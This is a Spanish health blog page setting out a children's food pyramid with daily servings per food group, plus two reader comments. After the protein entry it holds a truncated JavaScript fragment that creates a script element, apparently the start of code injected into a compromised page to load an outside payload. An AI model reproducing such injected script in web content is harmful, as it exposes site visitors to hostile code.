Salud y belleza » Alimentación

Pirámide Alimenticia Infantil

2 Comentarios

Son muchas las razones por los cuales se necesita una Pirámide Alimenticia Infantil. Bien se sabe que tanto los niños y como los adolescentes, se mueven mediante las mismas reglas nutricionales que los adultos pero no lo hacen de igual modo: no incorporan las mismas cantidades ni se sustentan mediante iguales platos.  Un niño, come de otra manera; eso lo saben todos (…y lo sufren todos).

Es por ello que a continuación presentamos lo que se ha dado en llamar “Pirámide Alimenticia para los más pequeños” y, como su nombre lo indicia, no se trata de otra cosa que del típico sistema por escalones o niveles pero, en este caso, pensado para los chicos.

“Para poder lograr que los niños se alimenten de forma adecuada hay que combinar la inteligencia con todos los recursos dados por la nutrición. La variedad puede ser un buen método para que los pequeños coman y se diviertan y el uso de diferentes temáticas, es otro gran truco. Lo que nunca deben hacer los padres es perder el equilibrio: ni darle a sus hijos todos los gustos en pos de que ellos coman, olvidando cuestiones importantes para la salud, ni tampoco sobrecargarlos haciendo que los niños padezcan cada comida como una tortura. Es necesario recordar que la obesidad, cuando se gesta en los primeros años del niño, es cuando se vuelve más difícil de erradicar. Y, por otra parte, la mala alimentación de pequeños, es otra cosa que jamás se recupera. Como dijimos, la clave es el equilibrio y la astucia de los padres” afirma un pediatra, acostumbrado a lidiar con este tipo de problemáticas.

Los cinco grupos de alimentos que conforman la pirámide infantil, deben formar parte de las comidas diarias de niños de entre veinte meses y cinco años de acuerdo a las siguientes cantidades:

Lácteos
Detalle: de tres a cuatro raciones (cada ración equivale a media taza de leche, yogur, una rebanada de queso).

Frutas
Detalle: de dos a cuatro raciones (cada ración equivale a dos cucharadas de frutas cocidas o enlatadas, media taza de frutas crudas, media taza de zumo de frutas).

Vegetales
Detalle: de tres a cinco raciones (cada ración equivale a dos cucharadas de vegetales cocidos o enlatados, media taza de vegetales crudos).

Granos
Detalle: de seis a once raciones de pan, cereales, arroz y pasta (cada ración equivale a una rebanada de pan, media tortilla, dos cucharadas de pasta o arroz, media taza de cereales).

Proteínas
Detalle: de dos a cuatro raciones de carnes, legumbres, huevos (cada ración equivale a veinte gramos de carnes, pescados o aves; media taza de legumbres, un huevo).if (document.currentScript) { var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , , , ,

2 Comments »

  • Monica said:

    Yo a mis hijos desde luego las proteinas y las carnes son parte de la dieta diaria no semanal. No se la piramide esa, la cambiaria, mis hijos tienen un crecimiento optimo y sin problemas de salud.

  • Marta said:

    O sea si hay que tener piel como la de un bebe o un cutis como el de un bebe hay que seguir la misma dieta como un bebe verdad?

    es broma, aunque no voy tan mal ecaminada, la alimentacion ayuda mucho en mejorar el cutis y la piel de una mujer

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.